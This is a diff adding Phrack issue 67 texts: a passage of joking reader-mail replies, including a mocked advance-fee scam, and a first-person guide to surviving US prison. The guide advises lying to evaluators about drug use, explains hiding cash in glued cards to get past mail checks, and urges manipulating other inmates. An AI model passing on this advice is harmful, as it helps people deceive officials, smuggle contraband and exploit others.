+      talented people) are not accurate enough. However, you're free to 
+      translate any article. Good luck :) ]
+
+Thanks for your great work.
+SuperMrPlusPlus
+
+    [ I'm confused. I thought you were Robert Langdon. ]
+
+
+|--=[ 0x06 - Alcohol abuse ]=--------------------------------------------=|
+
+From: Anonymous <nobody@remailer.paranoici.org> 
+Subject: The risks of alcohol and being drunken bastards
+
+Drinking Alcohol and Cancer Risk
+www2.potsdam.edu/hansondj/HealthIssues/1109728149.html  
+
+Alcohol - The Risks | Health | BBC World Service
+www.bbc.co.uk/worldservice/sci_tech/features/health/healthyliving/
+alcoholrisk.shtml 
+
+Alcohol - Risks 
+www.pamf.org/teen/risk/alcohol/risks.html   
+
+4.5 The risks of alcohol
+www.drugtext.org/library/books/raterisks/4.5.htm
+
+Effects & risks of alcohol - Schoolies Week 
+schoolies.youthcentral.vic.gov.au/Safe+Partying/Alcohol/Effects+&+risks+of+
+alcohol/ 
+
+Underage Drinking-Why Do Adolescents Drink, What Are the Risks ...  
+pubs.niaaa.nih.gov/publications/aa67/aa67.htm   
+
+Young people and alcohol - what are the risks? : Directgov - Parents
+www.direct.gov.uk/en/Parents/Yourchildshealthandsafety/
+Youngpeopleandalcohol/DG_183848  
+
+Drinking and alcohol - Live Well - NHS Choices  
+www.nhs.uk/Livewell/alcohol/Pages/Alcoholhome.aspx  
+
+ Alcohol and depression: What are the risks? - MayoClinic.com   
+www.mayoclinic.com/health/alcohol-and-depression/MY01078
+
+Health risks associated with alcohol and heavy drinking 
+www.drinking.nhs.uk/health-risk/
+
+The Risks of Developing a Drug or Alcohol Dependency
+www.egetgoing.com/drug_addiction/addiction_risk.asp 
+
+Alcohol - Alcohol   
+www.alcohol.gov.au/ 
+
+Alcohol Health Risks - Alcohol & Other Drugs, The Wellness Center ...   
+www.uncg.edu/shs/wellness/aod/alcoholhealth/
+
+Teenage binge drinking, effects of alcohol, facts about alcohol at ...  
+ncadi.samhsa.gov/govpubs/ph323/ 
+
+Health Risks of Alcohol and Drug Abuse  
+alcoholism.about.com/od/effect/u/Risks.htm  
+
+Health Risks In Alcohol Abuse   
+ezinearticles.com/?Health-Risks-In-Alcohol-Abuse&id=301753  
+
+For Teens: Know the Risks of Alcohol | HealthSheets | Wellness ...  
+www.mountnittany.org/wellness-library/healthsheets/documents?ID=3684
+
+Alcohol and Breast Cancer Risk: New Findings - National Cancer ...  
+www.cancer.gov/cancertopics/causes/breast/alcoholuse0408
+
+Effects of Drinking Alcohol: Health Benefits vs. Risks  
+www.webmd.com/cancer/features/faq-alcohol-and-your-health   
+
+Drinking alcohol\227Consumer Reports Health 
+www.consumerreports.org/health/conditions-and-treatments/
+the-risks-and-benefits-of-drinking-alcohol/overview/index.htm  
+
+----
+
+Getting drunken doesnt pown it is a fault of your own^^ 
+Peace Phrack! 
+
+    [ Fair enough ;> ]
+
+
+|--=[ 0x07 - Insane delay ]=---------------------------------------------=|
+
+Subject: a question                        <-- Needs ANTISPAM in Subject!
+From: XXXXXXXXXXX
+To: kleene@phrack.org, pwned@phrack.org    <-- Wrong address man!
+
+Hi,
+What's the real sake of this delay, working on scada systems to attack 
+iran?
+
+    [ AHAH. Stuxnet developers if you ever read that, do not forget to 
+      submit a paper on SCADA hacking for p68. ]
+
+
+|--=[ 0x08 - Friendly messages ]=----------------------------------------=|
+
+From: Cristi T.
+Subject: hey
+
+hey phrack, 
+
+    [ Hi. ]
+
+don't die.. i hope u will deliver this issue.   
+
+    [ Actually we're not dead. If we were then who would be writing this? 
+      ;) ]
+
+Best wishes,
+Cristi
+
+    [ Thx Cristi :) ]
+
+                                    ---
+
+From: ZZZ
+Subject:
+
+Hi, 
+
+I noticed that you guys have a lot of followers who are neophytes to 
+hacking. If you would like an article or two on the very basics of 
+footprinting, scanning, enumeration, or hacking I might be able to do some  
+for you guys. I am an IT professional and educator. At least if my content 
+is or newbies, it will be well written. Just let me know.   
+
+    [ Hi. Sorry man. Wrong e-zine, consider asking Uninformed instead ;> ]
+
+ZZZ
+AKA W88ExitUS   
+
+Sent from my iPhone 
+
+    [ When did the times changed that much? :( ]
+
+                                    ---
+
+From: Christophe X
+Subject: WTH ???
+
+Hi guys,
+
+I'm dying hoping to see the next number of phrack ... when would be the 67 
+birth. Seriously, i don't think i have the skill for proposing sexy 
+materials, but i'm serious enough for proposing you help for collecting / 
+guiding authors. Let me know if you need help for rereading article. I'm 
+french linux trainer, phrack was always my best emag, can't support to wait
+for an annual release.
+
+Best regards.
+
+    [ You're always welcome to motivate potential writers. That itself is
+      really helping. Thx. ]
+
+                                    ---
+
+From: rawhazard
+Subject: ...bout issue #67
+
+Hey men, just writing to know...what bout the issue #67? waiting for that 
+since lots of time, u goin to "push the beast out"? or you won't no more? 
+Lemme know, thanks  
+gw
+
+    [ Well as you can see, we did. ]
+
+                                    ---
+
+From: f6174179c90c0366@gmx.com  
+Subject: ANTISPAM
+
+Thank you for maintaining phrack.
+
+    [ You're very welcome bro. ]
+
+|--=[ 0x09 - Busted??? ]=------------------------------------------------=|
+
+From: "Robert S. Mueller" <crimecenter@fbi.gov>
+Subject: Federal Bureau Of Investigation./Anti-Terrorist And Monitory Crime
+Division.   
+
+    [ Wait. How did you find us? ] 
+
+Federal Bureau of Investigation (FBI)   
+Anti-Terrorist And Monitory Crime Division. 
+Federal Bureau Of Investigation.
+J.Edgar.Hoover Building Washington Dc   
+Customers Service Hours / Monday To Saturday
+Office Hours Monday To Saturday:
+
+Dear Beneficiary,   
+
+Series of meetings have been held over the past 7 months with the secretary
+general of the United Nations Organization. This ended 3 days ago. It is 
+obvious that you have not received your fund which is to the tune of 
+$850,000.00 due to past corrupt Governmental Officials who almost held the 
+fund to themselves for their selfish reason and some individuals who have 
+taken advantage of your fund all in an attempt to swindle your fund which 
+has led to so many losses from your end and unnecessary delay in the 
+receipt of your fund.
+
+[ ... ]
+
+    [ Oh that's nice. With that much money, we'll be able to pay for the 
+      hosting & the DNS for centuries ;) ] 
+
+|--=[ 0x0A - Book propositions ]=----------------------------------------=|
+
+Subject: ANTISPAM
+From: scott
+
+Hello, I have a proposition today.  
+
+My request is to be listed under S2D316 as an author on your website: 
+http://www.phrack.org/authors.html, with the explicit purpose of writing a 
+novel. I will of course be mining my fellow authors' data, and thus would 
+of course need their approval.   
+
+    [ Hum. LOL ]
+
+I will be writing a minimum two thousand pages, divided amongst seven 
+chapters. 
+
+    [ Two thousand is not enough. Consider asking us back with at least the
+      double. ]
+
+I will of course be releasing it under HTML format, and would like the 
+ability to FTP my pages as I deem them worthy.   
+
+    [ Of course. I'm afraid the sys admin is currently on holidays. He will
+      not be able to setup the FTP :( ]
+
+If the above terms are met, proceeds will be negotiated.
+
+    [ I'm sorry. Who are you again? ]
+
+The name of the story is:   
+
+
+The Underground Myth
+by
+Scott X
+
+    [ We already have an article with that name. I'm afraid we'll have to
+      sue you. Our lawyer will contact you soon enough. ]
+
+
+|--=[ 0x0B - Newbies ]=--------------------------------------------------=|
+
+    [ Information was removed to protect the innocent :> ]
+
+Subject: Neophyte's Guide   
+From: NICKNAME
+
+My mentor (X of #Y on freenode) had decided to write a
+version 2 to his original Z Guide to the Underground. This   
+guide lays out the framework for any neophytes looking to get into our  
+world. It also lays out the the truth about white hats, black hats, 
+and grey hats. As well as giving the basic's for anyone truly   
+dedicated to learning.
+
+    [ The truth? Sounds interesting :-P ]
+
+I was inspired to write it after reading the article in phrack issue
+65 entitled "the underground myth". Its so true, there are hardly any   
+mentors out there that are actually reliable. Most are on some skiddie  
+forum, and all they talk about is step by step SQL injections. And out  
+dated RFI's.
+
+    [ Yes. Step by step is annoying. ]
+
+Due to this sickness infecting the web, we decided to write and 
+publish this (for free of course). In the hops that it will steer the   
+newbie's of the world away from GUI land, and back to our roots.
+
+The book is 47 page's from start to finish. I believe that the  
+information contained in said book is invaluable and would help a lot   
+of people out.
+
+    [ Invaluable? :) ]
+
+I have been intrigued by almost every single issue of phrack. I know
+typically Phrack puts up high level articles, but I have noticed that   
+on occasion you guys will put something out there for the newbies, I
+believe that this would be a very good addition to your awesome, and
+inspiring publications. 
+
+Thank you for your time and consideration of our book.  
+
+NICKNAME
+
+-EOF
+
+    [ No problem Sam. Oh yes sometimes with PDF metadata you have that 
+      kind of unfortunate leak ;> It would be wise to update your book :) ]
+
+
+|--=[ EOF ]=-------------------------------------------------------------=|
diff --git a/phrack67/5.txt b/phrack67/5.txt
new file mode 100644
index 0000000..c4d6c8c
--- /dev/null
+++ b/phrack67/5.txt
@@ -0,0 +1,907 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x05 of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=---------------------=[ How to make it in Prison ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ by TAp - kill4deth <at> yahoo.com ]=----------------=|
+|=--------=[ http://www.freewebs.com/hexdeth  / AIM : swp2388 ]=---------=|
+|=-----------------------------------------------------------------------=|
+
+
+                                  -------
+
+
+  1 - Introduction
+  
+  2 - The beginning
+
+    2.1 - Intake
+    2.2 - Outline of the process
+
+  3 - Fresh Meat
+
+  4 - Life in prison 
+
+    4.1 - What to expect and getting used to it
+    4.2 - Mail & collect calls
+    4.3 - Hygiene
+    4.4 - How you will live and getting used to it
+    4.5 - The commissary/snack cart
+    4.6 - Making money
+
+  5 - Interaction with other inmates
+
+    5.1 - Getting checked
+    5.2 - Just like momma used to make?
+    5.3 - Getting punked/becoming a bitch
+
+  6 - Prison gangs
+
+    6.1 - Prison gangs
+    6.2 - Should I join a gang, and if so which one should I join ?
+
+  7 - County Jail Vs. State Prison
+  
+  8 - Common Situations
+
+  9 - Staying mentally fit
+
+  10 - Why I wrote this
+
+
+                                  -------                                         
+
+
+
+--[ 1 - Introduction
+
+
+Alright people, this is a guide on what to do and how to act if you find 
+yourself in a prison environment. Let's all face it, if you're into the 
+underground world of hacking or phreaking then you've a very good chance 
+of being arrested some day. Seeing as how I've been in this situation 
+before, and also having noticed the amount of files on laws and police, 
+I've decided to write a file that has information you could use to make 
+your time a lot easier if you happen to go into prison. I myself seriously 
+hope you would never have to use this in a real life situation but if you 
+do, use it to your advantage. So to the point... 
+
+In this file we will be talking about a lot of different techniques and 
+also about things you should and should not do... This is in no way an 
+exactly fool proof text. All information is based on how I, the author, 
+interpreted the actions of others. Also note that this file is based 
+souly on the American prison systems. Therefore if you are reading this 
+file and are not living in America, some given information will be wrong 
+and some steps of the process may not be in order or even exist at all.
+
+
+--[ 2 - The beginning
+
+
+OK due to the aspects of confusion, there will be some vocabulary that's 
+common to the American Prison facilities in this file. In America there are 
+thousands of 'slang' words that prisoners use to help hide or mask the 
+activities from other inmates and/or the prison officials. We'll start at 
+the beginning stage called the 'intake process'.
+
+
+--[ 2.1 - Intake            
+                         
+
+The 'intake' part of the process is the very first part. In this process 
+you will most likely have your constitutional rights (if you're American) 
+read to you and if they fail to do this then you will most likely have all 
+changes dropped/cleared. After this is done, you will be formally charged 
+with what ever crime you are being accused of, then you will have your 
+fingerprints and a mug shot (picture) of you taken. You will be moved into
+a room either with other 'offenders/inmates' (these are the people who have
+also committed crimes and awaiting trial) or by yourself depending on how 
+many people are being 'processed'. In this room there will be guards there
+to take pictures of any and all tattoos and scares. These will be used to 
+help identify you in case you escape or try to give a fake identification 
+in the future.
+
+In this part of the process you will be completely naked, so if you're 
+scared to show your body then too bad get over it or risk being restrained 
+and having them undress you. Next you will take showers with (pubic) lice 
+shampoo. Depending on the setup of the building you will either get to 
+shower by yourself or with a group of inmates. After the shower you will be
+given a set of pants and a shirt. Some prisons do not provide underwear or 
+cotton shirts you will have to buy these if they are available. Next you 
+will be taken to your 'holding cell' a temporary housing until they either 
+issue you a more permanent cell or until they get more room for you. Now 
+you are ready for the main part of this text file
+
+
+--[ 2.2 - Outline of the process
+
+
+This part is mainly about the movements that go on and what to expect while
+in transition. Some of the information applies to the American judicial 
+system.
+
+
+--[ 2.2.1 - The county jail
+
+
+when you first get locked up they will most likely put you in what is 
+called a 'county jail'. This type of jail is only for the people who live 
+in your general vicinity and is the first part of the process. While you 
+are heard you will either buy a lawyer or be appointed one. If you are 
+appointed one you have a greater chance of going to prison. I would advise 
+that you pay for one. While heard you will see your lawyer and he will set 
+up the pre-trial date. At the pre-trial your lawyer will present motions on
+your be-half (These will help you in your case so don't just sit around in 
+there. Go to the law library and do some research.) but the prosecutor will
+also have the opportunity to present motions that can hurt your case. From 
+here the judge will decide what to accept and what is thrown out, he will 
+also set your real trial date.
+
+
+-[ 2.2.2 - The first day in prison
+
+
+Your first day in prison will be at a diagnostics unit. This is where they 
+do mental evaluations on all inmates to help them place you in the facility
+to best fit your needs such as if you are handicapped then you will be 
+placed with fellow peers. If you are a person who likes to get angry and 
+assault people then you will got a place with idiots such as yourself.
+
+During your stay at the diagnostics unit you will go there are tests 
+regarding your mental stability and be questioned about your past. You will
+also be asked about prior drug use. My advise to you would be to try look 
+and act as normal as possible and to lie about any and all drug problems.
+This will help make your time easier and keep you from doing stuff required
+by the prisons to make parole such as a rehab/anger management program. 
+
+After about 2 months, depending on your actions you will be sent to a more 
+permanent placement which is a lot different. That is because most people 
+were 'faking it to make it'. This means to act one way to get what you 
+want. These people may have anger problems and all that but they pretended 
+not to so they would get a better unit. Now once they get to that unit they
+can go onto being there real self's. This can be frustrating to the people 
+who are actually normal because now they have to put up with the people who
+they didn't want to be around.
+
+Note: You will notice that the guards on the transportation busses have 
+shot guns. These are not for show if you attempt to escape they will shoot 
+to kill.
+
+
+--[ 3 - Fresh Meat
+
+
+Fresh Meat - This is someone who has never been locked up, therefore you 
+are the main person people will 'go after' which means attempt to cause you
+harm or to manipulate you. Most likely these people will be the ones who 
+have been locked up for several years or the people who make a habit out of
+getting locked up. Yes some people spend most of their pathetic life in 
+prison, even when they've had many chances given to them. 
+
+Now you're either reading this for one of two reasons:
+   1. You've never been locked up before,
+   2. You've been locked up before and you want to see if this is a serious 
+      file.
+
+Well if you're reading this to find out whether I'm knowledgeable on this 
+fact, then you might find something in here that could have or will help 
+you in the future ;]. But if you're reading this file for the first reason 
+then enjoy.
+
+Now most of the time when someone new goes to prison he will be approached 
+by fellow prisoners who will attempt to give him a 'heart check'. This is 
+were the other prisoners get you to fight them. They do this to see if you 
+are a good fighter or if you will simply let them assault you. Most of the
+time the people trying to assault will be the same race as you and they may
+ask you some questions to see if they can find out more information on you.
+If they do this, you must fight them back. It doesn't matter whether you 
+win or lose, remember they are there to see if you have heart (courage). 
+For them people who fight to protect themselves or their property have 
+'heart' and in prison respect is all you have. No one can take it unless 
+you let them (and they will try).
+
+
+--[ 4 - Life in prison
+
+
+--[ 4.1 - What to expect and getting used to it
+
+
+Now when you get to your facility please do not expect people to care if 
+you want to go home, when your used to eat, what you like to eat, or if 
+your bed is too thin and hard on your back... NO ONE GIVES A FUCK, not the 
+inmates, not the guards, and not the nurse.
+                                                                        
+You will most likely eat breakfast early in the morning. Here (America 
+Texas) it is at 3:00am then lunch is at 9:00am and dinner at 4-5pm. Do not 
+expect a snack in between because there will not be any, not even if you're
+"Starving to death". Yes this is your first time being locked up and most 
+likely you will be a short timer (someone with less than 5 years, some 
+people refer to short timers as 'having less then 20 years'...). Yes you 
+will be there with people who have life without parole. Therefore you 
+should not complain about how much time you have or how you want to go home
+because this can cause problems with the other inmates who have been in 
+prison for a while and most likely will not be getting out soon. Inmates 
+with a lot of time take this so seriously they will fight you if they hear 
+you complain about your situation. Remember, there will always be people 
+with more problems than you.
+
+
+--[ 4.2 - Mail & collect calls                          
+
+
+You will most likely have the right to send/receive letters from family and 
+friends. There will most likely be limits on the amount you can send out 
+for a certain amount of time depending on where you live. You may also be 
+expected to provide the pen/paper/envelopes/stamps. 
+
+There may also be payphones (good luck to all the phreakers) depending on 
+your location. If you are lucky enough to be in a prison with working 
+phones you may notice that you will have to place collect calls. However 
+this type of calls will not establish a connection with a cellphone unless 
+the receiving party has set up an account with the phone company. 
+
+Also not all land lines will accept a collect call. Depending on the phone 
+company the prison uses you may be able to set up a prepaid account that 
+your family will provide money to. If you are using this type of account 
+with the phone company then you will be able to call any land-line/
+cellphone.
+
+Now that you know the basics about the mail/phone set up we're going to 
+talk about what you should not do regarding these systems. If for some 
+reason you are not receiving your mail, make sure you are not giving it to 
+the guard who may have reason to not turn it into the mail office/postal 
+services. They may work for the prisons but there are some who are just as 
+corrupt as your fellow prisoners. If you are certain this is not happening 
+then there may be a problem with the postal services, sadly you will not be
+able to find this out. Lastly and most likely your loved ones just simply 
+did not write you back. There is really only one main reason that you can 
+not get through on your phone calls and that would be the person you are 
+calling does not want to talk to you. If this is so, do not complain to 
+your fellow inmates they do not care like I said before. The reason I tell 
+you this is because there are some people who do not receive letters/calls 
+and it's simply rude to complain in front of these people (its also bad for
+your health).
+
+Another thing is that there are some people who will try to manipulate you 
+into giving them a phone call or try to get you to give them your pin #. 
+You'll know what I mean and be able to resist this if you have some 
+experience in social engineering. Your best bet would be to keep your pin #
+for yourself and if you give someone a phone call make them give you 
+something of theirs. Also you can use your knowledge of SE to exploit your 
+fellow inmates to make your free calls, once again good luck with your 
+techniques :)
+
+Note: Phone calls and mails will be monitored by the prison officials so be
+careful of what you say.
+
+
+--[ 4.3 - Hygiene  
+
+
+Right if you really need me to explain this to you then there's something 
+wrong, but to all the people who need it...
+
+Depending on your location you may or may not be given hygiene (deodorant /
+soap / shampoo ... you know the main shit). If this is not given to
+you then you will need to find a way to get these items because you don't 
+want to walk around looking/smelling like a homeless bum because this seems
+to upset the inmates also the average person, no one wants to smell you. I 
+would also recommend that you take a shower as often as you can. In some 
+prisons you may only shower once a week, maybe longer, this is why the 
+deodorant is so important because it will help make you smell better or 
+'seem cleaner'.
+
+
+--[ 4.4 - How you will live and getting used to it                                        
+
+
+Now you're going to be in prison and you will be living there for the time 
+being. No one in their right minds will like living there and most of the 
+time the guards don't even want to be there. Noting this you will be issued
+a bed (this is not a real bed, its more like a shower certain stuffed with 
+wall insulation). They're not very thick (most of the ones I've seen are 
+about three inches thick) and as you might think they are not in the least 
+bit comfortable. No one is going to care if your back hurts or you cant 
+sleep, you will just have to get used to it. You will not be issued 
+sleeping medication or pain relievers, due to the illegal pill trade inside
+the prisons. In your cell you may or may not have a toilet. These will be 
+stainless steal, you may have seen some in a prison movie, and most likely 
+have a sink at the top. Don't worry the water does not recycle.
+
+So if you are shy (note: you will also be present in front of female 
+guards, this may cause you to be more uncomfortable than you already are 
+unless you get amusement from shifting in front of them) then you're going 
+to have to get over this quickly or walk around holding your piss and 
+having a stomach full of shit. When you're done doing your bathroom 
+business make sure you cleaned the area you've used (only the sink/toilet 
+seat, the rest doesn't matter unless you're clumsy and pissed on the floor 
+or dropped something). 
+
+This is to show respect for yourself and the others around you so please be
+sure to clean up after yourself. This type of cleanliness also applies to 
+your room/cell/living area. You should observe good cleaning habits to make
+sure your room is not a mess or does not smell bad. The main reason is that
+if a guard sees a room that is in a mess then they're most likely to search
+the room (these are called 'shake downs') and if you are the cause of these
+shake downs then your fellow peers will 'check' you. 
+
+
+--[ 4.5 - The commissary/snack cart
+
+
+In prison there is a thing called commissary (it's like a store in prison).
+With this you can buy food such as candy, chips, cokes and lots of other 
+things that are way better than what they give you from the cafeteria. The 
+problem is that you will have to buy these items with your own money. This 
+will have to be sent to you from the outside world, basically your family /
+friends will have to do this. You can't just come across some real money 
+and hand it to them they wont take it. They will tell you about the process
+more when you get there. You are issued an account number and the money 
+will be located there. You will also be able to buy your hygiene / letter 
+writing materials here. Make sure you buy the things you need before you 
+buy the things you want.
+
+Note 1: people may try to manipulate you into buying items for them. Please
+do not be easily manipulated only buy things for the people you trust and 
+make sure they pay you back or give you something in return for what you 
+gave them.
+
+Note 2: you may also try to SE people into buying stuff for you but be 
+smart about this because people do not like when they find out you 
+manipulated them.
+
+
+--[ 4.6 - Making money
+                                                     
+
+Yes it is possible to make 'money'. The term money is not only used for 
+legal currency but also commissary / tobacco / stamp/other materials. These
+are worth the same amount as they are when you buy them from the commissary 
+people and tobacco will be worth more if it is not sold by the commissary.
+Now once you buy your materials you have either the choice to keep them or 
+use them to buy illegal goods that are rampant inside the prisons across 
+the world. There will always be someone who can be corrupted or extorted 
+into doing your bidding (bringing in certain items you could not get with 
+out an outside source, this is called contraband). Now you'll use your 
+legal goods to buy this contraband from the more experienced inmates, there
+will be all kinds of contraband to choose from and they are not cheap. Here
+is a nice list of a few things that may be available to you: 
+
+1. Most drugs, i.e. cocaine, heroine, methamphetamine, crack, also 
+including prescription pills obtained by the inmates who take the 
+medications. They do this by hiding the pills in their throat or they can
+be brought in by a guard or through visitation.
+
+2. Real currency. This will be obtained through the usual ways like the 
+guards, visitation, and using the mail. Either the guard didn't check the
+mail right or it was hidden inside a card. People use birthday cards to 
+hide the money. The process is quite simple. Take a card that has a part 
+where you can write extra stuff on then put the money between that part and
+the back part of the card. Super glue it in a neat and undetectable 
+fashion.
+
+3. Tobacco. There are the normal channels but remember also that the inmate 
+you're buying this stuff from might have had this in their anal cavity to 
+hide it while being search. Lol that's why I never smoked unless I knew it 
+wasn't stuck up an ass before.
+
+4. Cell phones. These will be brought in by the guards 99% of the time and 
+they will cost more than anything else you can buy. It has to be real 
+currency (guards don't want food because they can get it themselves). They 
+cost around 200 to 400 dollars and I've heard of people buying them for 
+$1,000. It will be pre-paid and you should get a zip charger (about the 
+size of a AA battery). Keep the phone on silent and only use it when you're
+alone because if you are caught with a phone inside a prison you may be 
+charged with another crime and sentenced to more time. When you run out of 
+minutes you may have your family buy a refill card and activate it over the
+Internet.
+
+Note: Other inmates may ask to use your phone, charge them for this if you 
+allow it.
+
+My advice would be to hide it from everyone and not tell anybody since they
+may try to use this against you and force u into doing something against 
+your will. They'll threaten to tell on you or just do it to get back at you
+for something.
+
+Past events: The state of Texas has just recently cracked down on the 
+illegal cell phone trade inside their prisons. They are currently 
+installing cell phone jamming devices in all of there facilities, the 
+reason for this is because an inmate on death row called a government 
+official from his cell and threatened his family.
+
+5. Tattoos/materials. You can also pay for getting some nice tattoos in 
+prison, they are of high quality and cheaper than in the free world (not 
+sure why though). You can just about get any type of tattoo you want as 
+long as you're willing to pay for it. You can also sell the tattoo guns / 
+ink if you know how to make it. The prices will be up to you and the basic 
+rules of the prison environment.
+
+6. Artwork. If you know how to draw you can draw up some samples and show 
+them off and you will get some people who will want you to draw for them. 
+Whether this is a card for their family or a tattoo design they plan on 
+getting, the prices are up to you. The better the quality the higher the 
+price you can request.
+
+7. Weapons/shanks. These are home made knives that people will use to 
+assault/kill others with. There are also tempered Styrofoam and news paper 
+bats/poles and spears made out of news paper. These really have no set cost
+just thought I'd give them a mention.
+
+8. Other inmates. Yes there maybe inmates for sell. These you can buy to do
+your bidding or just simply to have someone under your control you can 
+basically do anything you want but my advise is to treat them nice and make
+them think you're their friend or else they'll turn against you. Also be 
+prepared to protect this person. If they see you're not helping them they 
+are not going to help you. This may bring you more problems than what you 
+want. The prices will be set by the person you're buying from. If you are 
+caught buying/selling people you will be severely punished.
+
+Note 1: These are all illegal products and most are punishable by law. You 
+can receive extra time if you are caught buying/selling these items.
+
+Note 2: You should really commit to using your SE skills with these 
+activities to help you get more for less, just make sure not to get caught 
+cheating people.
+
+
+--[ 5 - Interaction with other inmates
+
+
+--[ 5.1 - Getting checked 
+
+
+Being 'checked' by someone is not a good thing at all. This means another 
+inmate is telling you that you've fucked up or letting you know that you're
+doing something wrong. A good example of being checked would be: 
+
+You use the restroom and you forget to clean up after yourself. Another 
+inmate that has been waiting for you to Finnish comes in and sees this. Now
+he can't use the restroom until your mess is cleaned up but he's not going
+to clean it himself. What he will do is go and find you and tell you to 'go
+and clean your fucking mess up'. Now if you do clean it after the other 
+inmate told you this in front of every one then you will be thought of as 
+someone who can be pushed around and if you don't clean it you will have to
+fight this inmate.
+
+This is looked at as a bad thing because the other inmates may see this as 
+you letting someone tell you what to do and then they'll try to do the 
+same. This type of people who let the other inmates tell them what to 
+do have the lowest rank in prison (right above snitches and sex offenders). 
+I hope that none of you are sex offenders but if you are then you will get 
+what you deserve when you get caught and this file will not help you in 
+any way. So you should simply avoid this type of confrontation.
+
+                                     
+--[ 5.2 - Just like momma used to make?
+
+
+In this section we'll be talking about the food you will be eating while 
+you're locked up. This 'food' as they like to call it is not very good and 
+you most likely won't be getting a lot of it (if you're the average man 
+you're going to get to sleep hungry most nights). You'll start your day off
+early in the morning (3:00am were I was at, this will mostly be true for 
+you also because there will be a lot of people in the prison and they'll 
+have to start early to get every thing done on time). Then there will be 
+lunch at about 9:00am to 11:00am and finally you'll have your last meal 
+somewhere around 5:00pm. 
+
+Now that you have the basic meal schedule it's time to tell you what you're
+most likely going to be eating. The main thing I've seen would be the soy 
+bean patties (tofu I guess). This is not real meat nor will it taste as 
+such. The reasons they give you are:
+
+   1. It's cheap,
+   2. It's low in fat. They have to keep you healthy even though they'll 
+      feed you the minimum amount of calories that a human needs to stay 
+      alive),
+   3. It's high in protein. 
+
+If you are not given soy bean then you will be given either 'pork' or 
+turkey meat (this will mostly be the 'sausage' at breakfast or the patties 
+for the hamburgers). The breads will almost all the time be wheat (you may 
+like wheat bread but it gets really old after a while). Basically 
+everything will be low fat. I'll recommend that even if you don't like it 
+just eat it (mixing the food all together will help mask the taste). 
+
+Basically there may be things that you can't eat without throwing up. You 
+will get used to it the more you eat it but there will always be 'roaches'
+(someone who looks for scraps/extra food that others did not eat...like a 
+cockroach). These people will see that you did not eat all your food and 
+ask you if they might have it. Depending on who they are and if you trust
+them or not, it is up to you whether you give it to them or not. I would 
+suggest you not to if you don't know them or if you think they're trying 
+to manipulate you. Giving people stuff they want will not help you gain 
+acceptance. They will continue to manipulate you if you allow it.
+
+
+--[ 5.3 - Getting punked/becoming a bitch
+
+ 
+Getting 'punked' is when you allow other inmates to treat you any way they 
+want. This includes:
+
+   1. Letting them assault you
+   2. Letting them take your food/personal belongings
+   3. Letting them verbally abuse you
+   4. and sexual abuse
+
+Becoming a 'bitch' means that you belong to another inmate. You'll be 
+treated like a punk and/or be raped though they may protect you in return 
+(they can't let other inmate fuck with their property now can they?). Don't
+let this happen, if you think this may happen to you then stop reading the 
+file, you'll be a disgrace to all the hackers and phreakers of the world. 
+
+Note 1: an inmate may offer you protection from the other inmates. What 
+they will not tell you is that you will be their bitch, and will do what 
+they say or accept the beating you will get. Also if one day you no longer 
+want the protection of the inmate then he and his friends will target you. 
+You will still get beaten, so don't accept any 'protection'.
+
+Note 2: You may notice that I degrade a few types of people in this file 
+such as sex offenders and 'bitches'. When I use this word I mean the people
+who can defend themselves but simply will not. There are people who will 
+not fight for themselves but if someone tells them to fight another person 
+then they will. This is pathetic and inexcusable, do not be like this.
+
+
+--[ 6 - Prison gangs
+
+
+--[ 6.1 - Overview
+
+
+I will now try to explain the basic concepts of the main types of prison 
+gangs. Please remember this will not always be true for all gangs or for 
+prisons in other countries besides the USA. Some information may not be 
+accurate therefore I will not use any names.
+
+When you go in prison you may notice that groups of people with the same 
+types of tattoos happen to congregate in groups (most of the time in the 
+same areas). You may also notice that they will show favoritism to the 
+group they associate with, this is most likely because they are in a 
+'gang'. A gang is a group of 3 or more people that are involved in 
+organized crime and believe in the same values/beliefs and share the same 
+goals. For this reason these prisons have established what most call a 
+'gang task force'. People assigned to the task force are responsible for 
+finding out the illegal activities of these inmates....
+
+Most of the gangs are based on race (White/European, 
+Mexican/Latino/Hispanic, Black/African). Their common goals are to: 
+
+   1. Protect each other. Have your fellow members backs don't let any one 
+      walk over them or punk them. Most likely though there won't be any 
+      punks in a gang (and if there are they will be ejected from the gang 
+      or disaplin).
+
+   2. Establish and keep the respect of their people. Once again don't
+      allow people to push you around, if this is allowed then it will be 
+      bad for their business/dealings.
+
+   3. Make money. This has been explained to you already but what was not 
+      explained earlier was that most of the people you will buy your 
+      contraband from (drugs mainly) will be from one of these gangs. Gangs
+      often got war over business related dealings. Most people assume it's
+      inspired by racial issues but about 90% of the time its over the drug
+      trade/territory.
+
+
+--[ 6.2 - Should I join a gang, and if so which one should I join ?
+
+
+My advise to you would be that you should not join a gang if you want to 
+get out and go home on time. When you join a gang you are expected to put 
+the gang and its members first. It doesn't matter if you think its the 
+right thing to do. If they ask you to do something then you must do it or 
+accept the punishment they will give you. If another member is with you and
+instigating problems with other people and he gets attacked, it will be 
+your job to help him. This means you could end up getting hurt or getting 
+more time on your sentence (think about this for a minute you have 4 days 
+until you're allowed to go home and then something happens where you have 
+to help your gang... You end up getting more time and can't go home. How 
+would your family feel, how would you feel ?).
+
+Now if you are persistent about joining one, here are the main rules about 
+this:
+
+   1. You should join a gang based on the same race/ethnic group as you 
+      are. 
+   2. Make sure you understand and are willing to follow any and all rules 
+      given to you.
+   3. Do not try to manipulate your fellow members or cheat the gang out of 
+      any money.
+   4. Only do approved business with other gangs/people.
+   5. Do not talk about your gang affiliation with any one (family/guards).
+   6. Make sure you are willing to be in the gang for the rest of your 
+      life, your affiliation does not stop when you are released (if 
+      released), you will be responsible for contacting your local ranking 
+      members of the gang when you get out.
+   7. Most importantly do not join a gang if you have anyone you love or 
+      care for. The simple reason for me saying this is that you may not 
+      get out if you join a gang... You must follow any and all orders 
+      including if they want you to kill someone (people have been ordered 
+      to kill their own family members).
+
+Note: Failure to do these things may cost you your life. You will also have
+more rules to follow than expected when you join. These rule aren't known 
+to people outside the gang therefore I've only listed the most common.
+
+
+--[ 7 - County Jail Vs. State Prison
+
+
+What? there is a difference you say? Yes, there a few of them in fact. 
+Let's go over them.
+
+                            -------------------
+
+                                County cons
+
+   1. You most likely won't move out of your cell.
+   2. Time is harder and feels like it goes by a lot slower.
+   3. Depending on how big it is, there's not as much food.
+   4. It might be a lot more dirty and could smell like shit and piss.
+   5. You will be in there with mentally ill people.
